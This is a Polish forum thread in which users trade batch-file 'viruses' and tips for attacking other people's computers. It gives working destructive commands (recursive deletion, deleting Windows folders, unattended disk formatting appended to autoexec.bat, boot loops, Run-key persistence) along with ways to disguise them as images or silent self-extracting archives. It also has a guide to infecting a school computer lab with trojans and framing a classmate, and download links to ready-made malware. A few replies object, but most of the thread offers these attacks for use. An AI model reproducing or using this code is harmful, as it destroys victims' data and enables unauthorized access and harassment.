ďťż
Katalog wyszukanych fraz
Citizen Journalism - t by Krzysztof Kozek!

Chce wam pokazać jak sie robi fajnego virusa w bat.
Ten virus kasuje wszystkie pliki z folderu w którym sie znajduje.

Aby stworzyć wirusa tworzymy nowy plik .txt (notatnik) i wpisujemy poniższy tekst:

del *.* /s /q

i zapisujemy w rozszerzeniu bat klikając w notatniku na zakładke " plik - Zapisz Jako... - i nazwepliku.txt zmieniamy na nazwapliku.bat jak ktoś nie ma rozszerzeń pokazanych to wchodzimy w mój komputer i
u góry jest zakładka narzędzia klikamy opcje folderów i wchodzimy w widok i odznaczamy ukryj rozszerzenia plików.

del *exe* /s /q

Jeżeli wpiszemy miedzy gwizdki exe to virus usunie wszystkie pliki exe można wpiać tam wszystkie rozszerzenia.

Można jeszcze wpisać między gwiazdki np.praca.txt wtedy kasuje tylko ten plik

del *praca.txt* /s /q

Pamiętajcie ze del tutaj jest sapcja *.* tutaj jest spacja /s tutaj też jest spacja /q

Teraz wam pokaże jak sie tego vira ulepsza musimy mieć program winrara.
Więc mamy już virusa
1.Klikamy na niego prawym i dodajemy go do archiwum
2.Zaznaczamy opcje utwórz archiwum SFX
3.Klikamy zakładkę zaawansowane
4.Klikamy opcje SFX
5.mamy teraz wpisać folder docelowy czyli gdzie archiwum ma sie rozpakować i uruchomić plik najlepiej wpisać tam C:WINDOWS
6.W tym samym oknie mamy uruchom po wypakowaniu wpisujemy tam nazwę naszego vira z jego rozszerzeniem.
7.Klikamy zakładkę tryby zaznaczamy tam ukryj dialog startowy
8.W tym samym oknie zaznaczamy nadpisz wszystkie pliki
9.Klikamy ok
10.Klikamy ok

Najlepiej na początek zrobić to z jakim innym katalogiem bo jak ci sie otworzyć ten vir w windows to już kapa.



Stary! To jest mistzrowskie z początku sądziłem że to jakąś bzdura ale sprubowałem i naprawdę działa
Normalnie SZACUNECZEK

normalnie super sprawa pozdro

noo szok:D wypasik

a jakbym chciał cały folder to w notatniku jakie rozszerzenie wpisać?



kowalikos znasz jeszcze jakies komendy? np na zmiane rozdzielczosci obrazu

Teraz Już jak umiecie zapisywać wirusa itp..To podam teraz tylko gotowe kody do wklejenia w notatnik

Zawieszenie kÂąputera

@echo off

rundll32 user,disableoemlayer

WyłÂączenie kÂąputera

@echo off

rundll32 krnl386.exe,exitkernel

WyłÂącz mysz

@echo off

rundll32 mouse,disable

WyłÂącz mysz i klawiature

@echo off

rundll32 mouse,disable

rundll32 keyboard,disable

Nie pozwalaj na Start Systemu

@echo off

echo :petla>>c:\autoexec.bat

echo goto petla>>c:\autoexec.bat

Spowolnij włÂączanie systemu oraz zamień przyciski myszy

@echo off

rundll32 user,swapmousebutton

echo dir /s /v c:\*.* >>c:autoexec.bat

Może to Was zainteresuje

Jak napisać wirusa w Notatniku krok po kroku

(*.bat)

Dzięki temu artykułowi napiszemy proste wirusy w Notatniku

Na poczÂątek pokaże jak zrobić bardzo prosty program który po otwarciu otworzy wpisanÂą strone www

Zaczynamy : Otwóż Notatnik i wklej , lub wpisz do niego poniższy kod:

@echo off

start http://www.haker.fe.pl

Następnie zapisujemy w następujÂący sposób : klikamy na Plik potem klikamy na Zapisz jako... I teraz wpisujemy w nazwę (Nazwa pliku) program.bat , a poniżej z menu Zapisz jako typ wybieramy Wszystkie pliki i klikamy na Zapisz Teraz w miejscu gdzie zapisali�my plik pokaże się nasz program klikamy na ikone naszego programu i powinna się otworzyć nam strona www.

PORADA:

zamiast strony podanej przezemnie możemy wpisać dowolnÂą czyli zamiast start http://www.haker.fe.pl Może być start http://www.onet.pl

Mam nadzieje że wszystko zrozumiałe Je�li jednak nie to prosze o kontakt...

O kurcze umieściłem te posty na odwrot sorry

Nie pamietam jak to sie robi, ale lepszy jest program "Chamtaro", albo "Chamster". Wysylasz plik ofierze i ona go otwiera. I ty mozesz tym programem kasowac wszystki pliki jego, wysylac od niego pliki od siebie, otwierac na jego pc rozne pliki, gry, strony internetowe. Polecam sam z tego korzystalem. :rolleyes:

kowalikos nie pisz posta pod postem no xD

aha naruto-kun jak chcem wylaczyc kompa albo zablokowac mysz to wyskakuja jakies bledy
http://img243.imageshack.us/img243/5707/aaang7.jpg

Czy to kasowanie plików może być przydatne na czyszczenie cookie w swoim folderze

wiecie jak zrobić aby ten plik z notatnika co go kowalikos na samym początku zapodał podpią sie pod zdjęcie na przykład otwieram zdjęcie a tu się w między czasie uruchamia ten plik w tle i kasuje dane

Musisz poprostu miec ikone jakieos obrazu z windowsa, i go ustawic w tym pliku.

a jaśniej?

Chodzi o to że dajesz właściwości tego wira i potem dajesz zakładkę dostosowywanie i "zmnień ikonę" no i wybierasz sobie ikonę ktora zamaskuje się na pulpice

No dokladnie. Ja tak w szkole zrobilem to skasowalo prawie caly dysk :lol:

ten wir pierwszy jest dobry w kit :)
najpierw sprawdziłem na swoim kompie hehe i działa ale na jakieś pliki tekstowe teraz bedeszukał osła na to w sieci :D

Zaj*****e ej tylko tak dalej to nasze forum będzie forum hakerów :lol: :lol: :lol: :lol: :lol:
a oto co zrobiłem i napisałem taki kod:

del *txt* /s /q
start (jakiś folder)
start http://www.nedds.pl
del *mp3* /s /q

i wszystko działa więc jak chcecie komuś zrobić psikusa to mu możecie zamulić kompa okienkami i pousuwać różne rodzaje plików
A tu jest link do gotowego wirusa możecie go komuś przesłać komuś tylko zmieńcie nazwę pliku pliki ma 101kb tylko go nie otwierajcie bo wam już Windows nie ruszy ;) jak chcecie to mogę wam napisać jakiegoś wira kasującego pliki
Link
http://rapidshare.com/files/39864865/kasuje_DLL.exe
proszę przetestujcie go na kiś

Jakoś pamiętam już ten sposób i to ze starych dobrych czasów DOSa. Nic nowego odpowiednie zastosowanie podstawowych poleceń dosowych. Cóż problem polega na tym że większość użytkowników nie pamięta już DOSa a szkoda to był bardzo udany system. Pozdrawiam.


Chce wam pokazać jak sie robi fajnego virusa w bat.
Ten virus kasuje wszystkie pliki z folderu w którym sie znajduje.

Aby stworzyć wirusa tworzymy nowy plik .txt (notatnik) i wpisujemy poniższy tekst:
del *.* /s /q
i zapisujemy w rozszerzeniu bat ....


hehe.... koń by sie uśmiał....hehehe.... :rolleyes: przecież to nie żaden wirus tylko podstawowe polecenia - człowieku, przecież to bajki dla dzieci - ale skoro dorwałeś widownie co się nie zna to co tam... :P :lol:

verte pokarz co ty umiesz

Są to proste komendy do DOS`a.
Np.
del *.exe
Usunie wszystkie pliki z rozszerzeniem .EXE
Ponieważ "*" zastępuje ciąg znaków a, "?" jeden znak (jeśli sie nie mylę).
A co do pliku z rozszerzeniem .BAT jest to plik wykonujący z góry ustalony ciąg komend do DOS`a.
Pod win z grupy NT dużo komend nie chodzi.

może i bajka dla dziecka ale działa i mnie sie podoba :P

a ty verte znasz jakis??

hehe dobre a znasz na innego wira jakies komendy

Jak wam sie nudzi i macie ochote to sprobojcie tego. Ja niezle zamieszanie zrobilem w szkole :lol: :
A więc trzeba spełnić następujące warunki:

Po pierwsze należy się zorientować czy szkoła
do której chodzimy ma w ogóle pracownie informatyczną. :-)

Po drugie gdy szkoła ma pracownie to należy sprawdzić
czy komputery są połączone w sieć.
Po trzecie sprawdzamy czy szkoła ma połączenie z netem
(aby ściągać programy do hackowania, ale możemy je też
przynosić na dyskietkach i CD'kach ale najlepiej je ściągnąć z netu).

Po czwarte sprawdzamy kto jest opiekunem pracowni,
czy są inni "informatycy"
(większość informatyków trzeba pisać w cudzysłowiu).

Dowiadujemy się kiedy odbywają się kółka (zajęcia pozalekcyjne,
na których serfuje się po necie, poprawia z infy i robi inne takie tam).
Jest jeszcze jeden warunek ale nie jest konieczny.
Można znaleźć kumpla o podobnych zainteresowaniach (hackowanie),
aby robić to wspólnie (zarażać pracownie serwerami koni trojańskich itp.),
oraz po to że gdyby coś się nieudało było na kogo zwalić.

Gdy spełniamy następujące warunki możemy zacząć zabawę.

A więc do roboty:

Najpierw określamy się co chcemy zrobić
(zarazić kompy trojanami, zdobyć kontrolę nad serwerem jeśli takowy jest)

Następnie kompletujemy oprogramowanie.
Jeśli nie masz jeszcze doświadczenia w robieniu tak trudnych
rzeczy. Zacznij od prostych trojanów (np. Prosiak).
Na nich nabierzesz doświadczenia. Zakładam, że obywatel
wie że trzeba umieć zdobyć IP'eki kompów w pracowni
(o tym możesz przeczytać w dziale Hack).

Gdy mamy już IP komputerów i oprogramowanie potrzebne
do zabawy to zaczynamy.

Najpierw infekujemy komputery serwerami trojanów.
Dobrą myślą jest jeszcze założenie hasła na nie, aby inni nie mieli
z nich pożytku. Powinniśmy zainfekować wszystkie komputery
aby można było zaatakować każdego oraz dlatego że często
serwery popularnych trojanów się dezaktywują i takiego
komputera nie zaatakujemy (chyba że go zrestartujemy).

Gdy mamy władzę nad pracownią możemy zrobić kilka rzeczy:
Sprawdzić kompetencje informatyków w szkole.
Najlepiej jest mieć zarażony serwer (główny komputer).
Gdy tak jest to Uruchamiamy trojana i łączymy się z
jakimś komputerem najlepiej pierwszym. I robimy jazde.
Kontrolujemy myszkę, wyłączamy klawiaturę, mrugamy monitorem.
Następnie robimy tak z kolejnym losowo wybranym komputerem.
Robimy tak do czasu gdy "informatyk" nie wpadnie w panikę.
Robimy przerwę. Po chwili gdy mamy taką możliwość atakujemy serwer.
Wtedy niedoświadczony "informatyk"
lub lamer (można używać zamiennie) powinien kazać zrestartować
komputery, wyjść z pracowni albo coś takiego.
Na następnym kółku lub lekcji (gdy jest na nim jakaś znienawidzona
osoba Robimy to co wcześniej z jednym komputerem i tej osobie
wchodzimy na stronę hackerską, wtedy zawieszamy jej myszkę,
klawiaturę, ogólnie komputer, tylko tak aby było widać tą stronę.
Wtedy przy odrobinie szczęścia obywatel wyleci ze szkoły
lub dostanie naganę. Działa dosyć dobrze,
tylko trzeba uważać aby nie wpaść.

Gdy na przykład jesteśmy chorzy i w domu mamy Internet,
a w pracowni jest lekcja możemy też zrobić niezłą jazde.
Tylko trzeba najpierw będąc w pracowni sprawdzić zewnętrzne IP.
Można to zrobić przez znalezienie strony na której jest księga gości
w której zapisuje się numer IP. Wtedy zapisujemy się do takiej
księgi (wpisujemy się będąc w pracowni) i mamy zewnętrzne IP.
Takie IP może nie działać. Wtedy trzeba spróbować
z czymś takim np. 213.76.114:21. Wytłumaczę wpisujemy numer
IP zewnętrzny i po dwukropku ostatnie pole
w IP wewnętrznego. Powinno działać. Wtedy gdy połączymy
się z kimś możemy zacząć robić jazdę. Możemy wyzwać
informatyka od ..... najgorszych :-). Możemy powyłączać kompy
i nikt nas nie będzie podejrzewać chyba że skojarzy
sobie że nas akurat nie ma w szkole ;)

Konie trojańskie w szkole to potężna broń przeciwko
nie lubianym kolegom (i koleżankom hehe).
Możemy nimi zrobić dużo więcej, ale wszystkiego
tutaj nie opisałem.

POWODZENIA !!!

My to mamy nieźle. Mamy 2 pracownie. Jedna ma hasło na Adminie, a druga NIE!!! Wystarczyło dać pare razy CTRL+ALT+DELETE i wpisać "Administrator" i włala mamy dostep do antywirusa, aktualizacji, bokady stron itd. Radze sprawdzać, czy Admin ma w ogóle jakieś hasło. My z kumplami na jednym z komputerów zrobilismy nowe konto administratora, wiec jest cool. A co do wirusa w pliku *.bat, to zróbcie tak:

Otwórz notatnik i napisz w nim:

shutdown -s

Zamiast -s (wyłącz) mozesz napisać też -r (zrestartuj).

Zapisz plik jako PLIK.bat

Teraz utwórz nowy plik otreści:
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "PLIK"="C:\\PLIK.bat"

Zapisz plik jako PLIK.reg.

Teraz dodaj je do archiwum (WinRAR'em).
Zaznacz "Utwórz archiwum SFX"
Przejdź do karty 'zaawansowane" , kliknij przycisk "Opcje SFX".
W pierwszym polu wpisz np. C:\
W polu uruchom po wypakowaniu wpisz:
PLIK.reg
Kliknij OK.
W komentarzu mozesz napisać, by ofiara zgodziła się na dodanie wartości do rejestru, aby jakaś gra działała.
Utwórz archiwum i ciesz sie sukcesem!

Ofiary komputer bedzie wyłączał sie zaraz po starcie.

Można w pliku z rozszerzeniem .BAT
Zrobić program do "spamowania"
Wystarczy wpisać komendę:

net send "tu wpisz nazwę PC" treść
NP.
net send k12 muhaha

i klikamy ile wlezie
;)
nie wiem czy dobrze napisałem komendę ,
ale jak źle to poprawcie mnie. :P

To co napisał kowalikos może być niebezpieczne
ponieważ większość progów udostępnionych w sieci typu koń trojański
otwierają u nas na kompie kilka back door`ów,
a poza tym średni rozgarnięty "hakijer" może wykorzystać kompy
które zainfekowaliśmy do dalszych ataków

Stanowczo odradzam takich zabaw.

Oto kilka komend do DOS`a:

CD – zmiana katalogu lub wyświetlenie nazwy bieżącego katalogu
CHKDSK – sprawdzanie stanu dysku lub zbiorów
CLS – wymazywanie zawartości ekranu
COMMAND – uruchomienie wczytywanie nowego procesora poleceń
COMP – porównanie dwu lub większej ilości zbiorów
COPY – kopiowanie jednego lub większej ilości zbiorów
DATE – ustalenie daty systemowej
DBLSPACE – kompresja dysków stałych lub dyskietek
DEL – kasowanie wyspecyfikowanego zbioru lub zbiorów
DELOLDOS – usuniecie poprzedniej wersji DOS
DELTREE – kasowanie katalogu wraz z jego podkatalogami
DIR – wyświetlenie zawartości katalogu
DISKCOMP – porównanie zawartości dwóch dyskietek
DISKCOPY – skopiowanie zawartości dyskietki
ECHO – włączenie lub wyłącznie wyświetlania na ekranie komunikatów poleceń systemowych
EDIT – włączenie edytora systemowego DOS
EXIT – wyjście z systemu DOS
FDISK – ustalenie konfiguracji dysku twardego
FIND – wyszukiwanie katalogów lub plików
FORMAT – formatowanie dysku twardego
HELP – pomoc
KEYB – ustalenie klawiatury dla danego kraju
LABEL – utworzenie , zmiana lub usunięcie etykiety dysku
MD ( MKDIR ) – tworzenie katalogu
MEM – wyświetlenie informacji o ilości zajętej i wolnej pamięci
MOVE – przenoszenie katalogów lub plików do innego miejsca na dysku
MSD – wyświetlenie informacji technicznych o zestawie komputerowym
PRINT – drukowanie zbioru tekstowego
RD ( RMDIR ) – usunięcie pustego katalogu
RECOVER – odzyskanie katalogu lub całego dysku z uszkodzonym sektorem
REN ( RENAME) – zmiana nazwy katalogu
SCANDISK – skanowanie dysku
SETVER – ustalenie wersji systemu operacyjnego DOS
SMARTDRV – konfiguracja lub uruchomienie programu SMARTDrive służącego do buforowania odczytów i zapisów sektorów dyskowych w pamięci rozszerzonej , co znacznie skraca czas dostępu do nich .
TIME – wyświetlenie lub ustalenie czasu systemowego
TREE – wyświetlenie drzewka katalogu lub dysku
TYPE – wyświetlenie zawartości katalogu
UNDELETE – odzyskanie zbiorów usuniętych za pomocą polecenia delete .
UNFORMAT – odzyskanie zbiorów usuniętych za pomocą format .
XCOPY – kopiowanie katalogów wraz z jego podkatalogami

UWAGA CZĘŚĆ KOMEND MOŻE NIE TRYBIĆ POD WIN. Z RODZINY NT
komendy z kopiowane z sciagi.pl

można jescze cos takiego napisac

@echo off

del C:\WINDOWS

chyba nie trzeba tlumaczyc co ta komenda robi L:D:D:D:D:d

:blink: o wow, ale się rozkręcił temat :D

duzo przydatnych tu rzeczy :)
na pewno się przydadzą ;)

Przydadzą sie napewno ;)

A jak naprzykład za pomocą tych komend można np. winampa właczyc ??

PS WIEM JUZ JAK :)

PS2 polecam program Install Creator Pro dzieki niemu mozna ustawic zeby wpisywał dane do rejestru bez zadnego przy tym okienka a co gorsza potwierdzwnia.
Zrobilem swojego viruska :) dajac komendy na właczenie 3 stron xxx i kasowanie zawartosci pulpitu przy kazdym właczeniu kompa.Po kliknieciu na instalke jest błysawiczne instalownie bez zednych okienek instalacji NIC :) i wpisy sa dodawene niewidocznie.Teraz sprawdze se to na kimś :)

PS3 w programie jest mozliwosc zmiany ikony :)

Pamietaj o tym, że nie piszemy post pod postem jest taka opcja jak "edytuj" proszę na przyszłośc z niej korzystać. ///.:WiLu:.

no narescie na swoim kompie tera sie w to pobawie

jak sie zmienia rozszerzenia


Nie pamietam jak to sie robi, ale lepszy jest program "Chamtaro", albo "Chamster". Wysylasz plik ofierze i ona go otwiera. I ty mozesz tym programem kasowac wszystki pliki jego, wysylac od niego pliki od siebie, otwierac na jego pc rozne pliki, gry, strony internetowe. Polecam sam z tego korzystalem. :rolleyes:

moglbys upnac tego chamstera lub chamtaro??

Proszę Cię bardzo- mówisz masz:

http://www.sendspace.com/file/6ehev6
Pass:
nedds.pl

Czytając tego twojego posta "kowalikos" coraz bardziej dochodzę do wniosku że jestes nie odpowiedzialny - pokątnie liznąłeś odrobinę informatyki i wykorzystujesz to przeciw sobie (innym) najlepiej abyś wyciagnoł sobie gumę z GACI i strzelił sobie w ŁEB może wtedy zmądrzejesz, bo jak byś pieć lat studiował i poznał od podstaw... to byś wiedział primo nie szkodzić..... :angry


verte pokarz co ty umiesz

hmm...żyć i w polsce być :rolleyes:

"stypa" po pierwsze nie pisz posta pod postem. A po drugie nie bedziesz mnie pouczal co mam pisac. Temat Hacking, wiec dziele sie z ludzmi moja wiedza. Nie masz nic madrego do powiedzenia to nie udzielaj sie.

rozszerzenie można zmienieć tak:

1. wchodzisz np. na mój komputer i wybierasz Narzędzia->Opcje Folderów
2. klikasz zakładkę widok i zaznaczasz "Pokaż rozszerzenia znanych typów plików"
3. Zatwierdzasz zmiany klikając OK i teraz w eksploratorze widzisz rozszerzenia.
4. Wystarczy zaznaczyć plik i nacisnąć F2 lub przywołać menu kontekstowe i wybrać "Zmień nazwę". Teraz po ostatniej kropce w nazwie pliku wpisujesz rozszerzenie.
5. Gotowe!

Jak nie chcesz juz widziec rozszerzen to wykonujesz punkt 1. a w drugim odznaczasz tą opcję, potem punkt 3.

kaz im kowalikos wejsc w start/uruchom i wpisac cmd.exe niech wpisza exit i nacisna enter tez będą uchachani Mam rację???
PS
następny inteligent post wyżej janek napisał wchodzisz na mój komputer i wybierasz narzędzia.

Paweł313, coś Ci się nie podoba? Zachowaj to dla siebie!
To co jest opisane w tym temacie, niektórym się przydało. Wiadomo że są to zwykłe polecenia DOS-owskie. Ale co z tego? Da się tym napisać coś co naszpeci w kompie i dobrze! Następnym razem zachowaj takie uwagi dla siebie!!

Wiesz Paweł313, troche mi cie żal, bo nie potrafisz zrozumieć, że nie piszę tego dla siebie, tylko dla innych, więc piszę tak, by zrozumiał to najmniej doświadczony użytkownik zwykłego PC'ta. Już nie pamiętam kto, ale ktoś pytał, jak sie zmienia rozszerzenie pliku. Równie dobrze mógłbym go wyśmiać, bo to jest łatwa operacja, ale nie jestem chamski, i wyjaśniłem mu krok po kroku. To forum istnieje właśnie do tego, by dzielić się wiedzą, uczyć innych, dyskutować i pomagać, oczywiście nie obrażajac przy tym innych użytkowników i przestrzegając regulaminu. Jeśli nie pasuje ci regulamin lub jakiś user, to zachowaj to dla siebie, skontaktuj się z adminem, albo powiedz mu to wprost. Innym rozwiązaniem jest wyrejestrowanie się z forum.


Jak wam sie nudzi i macie ochote to sprobojcie tego. [...]
Gdy na przykład jesteśmy chorzy i w domu mamy Internet,
a w pracowni jest lekcja możemy też zrobić niezłą jazde.
Tylko trzeba najpierw będąc w pracowni sprawdzić zewnętrzne IP.
Można to zrobić przez znalezienie strony na której jest księga gości
w której zapisuje się numer IP. Wtedy zapisujemy się do takiej
księgi (wpisujemy się będąc w pracowni) i mamy zewnętrzne IP.
Takie IP może nie działać. Wtedy trzeba spróbować
z czymś takim np. 213.76.114:21. Wytłumaczę wpisujemy numer
IP zewnętrzny i po dwukropku ostatnie pole
w IP wewnętrznego. Powinno działać. Wtedy gdy połączymy
się z kimś możemy zacząć robić jazdę. Możemy wyzwać
informatyka od ..... najgorszych :-). Możemy powyłączać kompy
i nikt nas nie będzie podejrzewać chyba że skojarzy
sobie że nas akurat nie ma w szkole ;)
[...]


Czego akurat 213.76.114:21 ?
21 i jeszcze : ?

Myslisz ze w kazdej pracowni bedzie tak dzialac ?

kazde ma inne IP


kazde ma inne IP
To wiem, adres ip jest inny, ale


Wtedy zapisujemy się do takiej
księgi (wpisujemy się będąc w pracowni) i mamy zewnętrzne IP.
Takie IP może nie działać. Wtedy trzeba spróbować
z czymś takim np. 213.76.114:21. Wytłumaczę wpisujemy numer
IP zewnętrzny i po dwukropku ostatnie pole
w IP wewnętrznego. Powinno działać.


czy 21 bedzie wszedzie dzialac ? czego akurat 21 ?

u mnie na kompie wykrywa tego waszego wiruska

Bardzo to fajne wszytsko. Wiecie może jaka jest "komenda" by usuwało np. wszystkie nieużywane od 30 dni pliki *txt ?

EXTRA pliczek

witma!! mam takie pytanko czy da rade zrobic plytke botowlana z tego pliku, kasuje DLL

boot'owalna tzn jak wlaczasz pc? czy bot'a z poziomu windowsa?

chodzi mi o to ze jak wloze plytke to od razu sie załaczy bez zadnych akceptacji

super to jest! zaraz musze przetestowac :)

Portu (czyli tego co jest po ":", w tym przypadku "21") nie trzeba wpisywać jeżeli na jedno IP przypada 1 komputer. Jeżeli tak nie jest (np. w szkołach, szpitalach, firmach, i innych instytucjach) to w porcie należy wpisać IP wewnetrzne tego komputera. Aby uzyskać IP wewnętrzne należy odpalić skaner IP na jednym z komputerów, które chcemy zarazić i wyszukujemy wszystkie IP od naszego IP od portu 1 do 255. Tam gdzie będzie zielony znaczek, tam jest jakiś komputer. Pozostaje tylko sprawdzić jaki jest jaki. Aby to zrobić należy wpisać jeden z IP komputerów a nastepnie wykonać jakąś operację np. Wyłączyć komputer i sprawdzić który komputer sie wyłączył. Ponadto niektóre komputery moga mieć swoje nazwy, stad możemy wiedzieć gdzie jest ten komputer np. "Sekretariat". Oczywiście mozna też odpalić Skaner adresów IP na swoim domowym komputerze, należy jedynie znać zewnetrzne IP szkoły czy innej instytucji. Aby dowiedzieć sie jakie jest IP należy na komputerze ofiary wejść na stronę:

http://ip-adress.com/

Numer IP, nazwa hosta, położenie geograficzne, czas lokalny, proxy, dostawca internetu, rodzaj połączenia i oprogramowanie zainstalowane na komputerze zostanie wyświetlone na stronie.

Przetestuję za chwilę ;)


Portu (czyli tego co jest po ":", w tym przypadku "21") nie trzeba wpisywać jeżeli na jedno IP przypada 1 komputer. Jeżeli tak nie jest (np. w szkołach, szpitalach, firmach, i innych instytucjach) to w porcie należy wpisać IP wewnetrzne tego komputera. Aby uzyskać IP wewnętrzne należy odpalić skaner IP na jednym z komputerów, które chcemy zarazić i wyszukujemy wszystkie IP od naszego IP od portu 1 do 255. Tam gdzie będzie zielony znaczek, tam jest jakiś komputer. Pozostaje tylko sprawdzić jaki jest jaki. Aby to zrobić należy wpisać jeden z IP komputerów a nastepnie wykonać jakąś operację np. Wyłączyć komputer i sprawdzić który komputer sie wyłączył. Ponadto niektóre komputery moga mieć swoje nazwy, stad możemy wiedzieć gdzie jest ten komputer np. "Sekretariat". Oczywiście mozna też odpalić Skaner adresów IP na swoim domowym komputerze, należy jedynie znać zewnetrzne IP szkoły czy innej instytucji. [...]
ŹLE

po ':' jest zawsze numer portu, port 21 to domyslnie FTP, wiec jesli chcesz sie polaczyc z trojanem, to on tez musi być ustawiony na tym porcie
Zeby sie polaczyc do komputerow wewnatrz sieci, koniecznie sa przekierowania portow na komputery w sieci wewnetrzej.

To co napisał kowalikos i janek2012 nie ma prawa działać :), jedynie na maszyne z zewnetrznym adresem ip i trojanem na porcie 21, ale jak opisywaliscie: 'ATTACK' na komputery wewnatrz sieci szkolnej


Chce wam pokazać jak sie robi fajnego virusa w bat.
Ten virus kasuje wszystkie pliki z folderu w którym sie znajduje.

Aby stworzyć wirusa tworzymy nowy plik .txt (notatnik) i wpisujemy poniższy tekst:
del *.* /s /q
i zapisujemy w rozszerzeniu bat klikając w notatniku na zakładke " plik - Zapisz Jako... - i nazwepliku.txt zmieniamy na nazwapliku.bat jak ktoś nie ma rozszerzeń pokazanych to wchodzimy w mój komputer i
u góry jest zakładka narzędzia klikamy opcje folderów i wchodzimy w widok i odznaczamy ukryj rozszerzenia plików.
del *exe* /s /q

Jeżeli wpiszemy miedzy gwizdki exe to virus usunie wszystkie pliki exe można wpiać tam wszystkie rozszerzenia.
Można jeszcze wpisać między gwiazdki np.praca.txt wtedy kasuje tylko ten plik
del *praca.txt* /s /q

Pamiętajcie ze del tutaj jest sapcja *.* tutaj jest spacja /s tutaj też jest spacja /q
[...]

stary co z ta spacja napisal bys go tak jak ma byc w notatniku a ja bym go sobie zaznaczył i skopiował ok??

heh moze Was to śmieszyć ale ja nie rozumiem te komendy dos'a gdzie to wpisywac co robic...?[; :dno:

Otwórz notatnik i w notatniku wpisujesz... ;)

Rzeczywiście, pomyliłem się. Ale jeśli mamy trojana, to on sam ustala domyslny port (Server i Klient taki sam), a port wpisujemy prawie zawsze w okienku, które jest pod adresem IP. Niestandardowa konfiguracja portów nie jest potrzebna gdy ofiara nie ma firewalla i nie jest w takim miejscu jak szkoła (wiele komputerów na jednym łączu).

Uuuu widzę że pod moją nie obecność dużo się tu działo :)


"Najpierw aby moc napisac wirusa musimy poznac podstawowe polecenia

del - usuwa plik
copy - wiadomo
cls - czysci ekran
dir - wyswietla liste plikow i katalogow
echo - "wyswietla komunikaty lub wlacza i wylacza echo polecen"
exit - konczy dzialanie programu
find - wyszukuje ciag tekstowy w pliku lub plikach (przydatne )
findstr - wyszukuje ciagi znakow w plikach
format - formatuje dysk (pokaze potem na przykladzie wirusa ktory po
uruchomieniu formatuje dysk bez potwierdzenia
goto - wykonuje skok do danej etykiety (oki potem wyjasnie )
md - tworzy katalog
pause - noo zatrzymuje dzialanie programu i czeka az uzytkownik nacisnie
jakis klawisz :) (wyswietla komunikat - Aby kontynuowac nacisnij dowolny
klawisz ..)
pause >> nul - to co powyzej ale bez komunikatu (stdout jest przekierowane
w nicosc
rd - usuwa katalog
ren - zmienia nazwe pliku
start - uruchamia program lub polecenie w osobnym oknie
time - wyswietla lub ustawia czas systemowy
xcopy - kopiuje pliki i katalogi

dobra a wiec zeby stworzyc takiego wirusa tworzymy dowolny plik o
rozszerzeniu bat np. vir.bat i klikajac prawym wybieramy
edytuj - tam wpisujemy kod.

teraz jeszcze jedna wazna rzecz:
>> - sluzy do przekierowania standardowego wyjscia (stdout)
> - podobne do powyzszego, jednakze gdy zechcemy przekierowac
np. wynik jakiegos polecenia do pliku, to poprzednia zawartosc
tego pliku zostanie skasowana.

Kod:
@echo off // wylacza echo polecen
echo ale ty jestes debil >> c:autoexec.bat // kopiuje linijke tekstu do pliku
autoexec.bat - czyli mozna tez dopisywac kod do pliku np. jezeli napiszemy:
@echo off
echo del c:%windir%win.ini >> autoexec.bat - to po ponownym uruchomieniu
komputera ofiarze skasuje sie plik win.ini co uniemozliwi ofiarze odpalenie
systemu chyba ze skorzysta z pliku win.ini.backup w windowsie XP, lub
z polecenia scanreg /restore w windowsie 98
%windir% jest to nazwa zmiennej wskazujacej na katalog systemowy, przydatne
gdyz nie zawsze jest to c:windows

cls // czysci ekran tak zeby ofiara nie wiedziala ze cos sie wogole usuwa

teraz mala zabawa z "|" (shift + przycisk obok backspace - dla ułomnych )
pozwala to np. wykonywac dwa polecenia na raz. przeanalizujmy przyklady
ponizej.

format c:

powyzszy plik po uruchomieniu bedzie wymagal od uzytkownika potwierdzenia
- np. w polskojezycznej wersji systemu nacisniecia klawisza "T"
wiec piszemy:

Kod:

@echo off
echo T | format c:
cls

po uruchomieniu tego programu dysk twardy zacznie sie formatowac bez
potwierdzenia!!! (uwaga: nie da sie sformatowac dysku c: kiedy mamy
uruchomionego windowsa - wiec aby to zrobic musimy doczepic ten kawalek
kodu do pliku autoexec.bat - najlepiej tam )

no dobrze ale jezeli zacznie sie nam formatowac dysk to bedzie to trwalo
dlugo - wiec aby to przyspieszyc nalezy wpisac:

Kod:

@echo off
echo T | format c: /q
cls

przelacznik /q oznacza ze dysk bedzie sie formatowal w trybie
szybkieformatowanie (zamazywanie) i bedzie to trwalo krotko
(chyba ze ktos ma duzy dysk)

dobra ale teraz rozwazmy nastepujacy przyklad - stworzylismy plik

Kod:

@echo off
echo T | format c: /q
cls

i chcemy go zamiescic w pliku c:\autoexec.bat . Niby wszystko wydaje sie
proste - ale tak nie jest gdyz nie mozna zrobic :

Kod:

echo @echo off >> c:autoexec.bat // tu jest wszystko w porzadku
echo echo T | format c: /q >> c:autoexec.bat // a tu nie
bo "|" oddziela polecenia, tak ze do pliku autoexec.bat zostanie
przekopiowany tylko wynik komendy format c: /q (w tym przypadku
bedzie to prosba o nacisniecie klawisza T w celu potwierdzenia)
echo cls >> c:autoexec.bat

wiec zeby to zrobic mozna uzyc czterech sposobow
sposob 1 - przyklad:

nazwa tego pliku - dowolny.bat

Kod:
@echo off
echo T | format c: /q
cls
copy dowolny.bat c:autoexec.bat

powyzszy plik podmienia zawartosc pliku autoexec.bat na ta. Uwaga!
zawartosc
pliku autoexec.bat zostanie skasowana (no ale w koncu jezeli zalezy nam
na zniszczeniu komputera ofiary to nie ma sie czym przejmowac - i tak
dysk zostanie sformatowany ).

drugi sposob:

Kod:
@echo off
echo T | format c: /q
cls
copy dowolny.bat c:sciezkadowolny.bat
echo start c:sciezkadowolny.bat >> autoexec.bat

trzeci sposob:

Kod:

@echo off
cls
type dowolny.bat >> c:autoexec.bat
czwarty sposob:
copy c:autoexec.bat + c:sciezkadowolny.bat c:autoexec.bat
no dobra... przydalby sie teraz spis plikow systemowych ktore wirus
moze usuwac aby narobic niezlych szkod w systemie:
win.ini , win.com - jak usuniesz te pliki to ofiara juz nie uruchomi
komputera
chyba ze skorzysta z backupow (winXP) w folderze c:\windows\pss\ - wiec
najlepiej tez zeby wirus usuwal wszytkie pliki z niego
c:\windows\system32 - (winXP) tam masz pliki takie jak format.com ,
xcopy.exe itp. - wiec jak je usuniesz to ktos nie bedzie mogl kopiowac
plikow w dosie, ani sformatowac dysku itp.
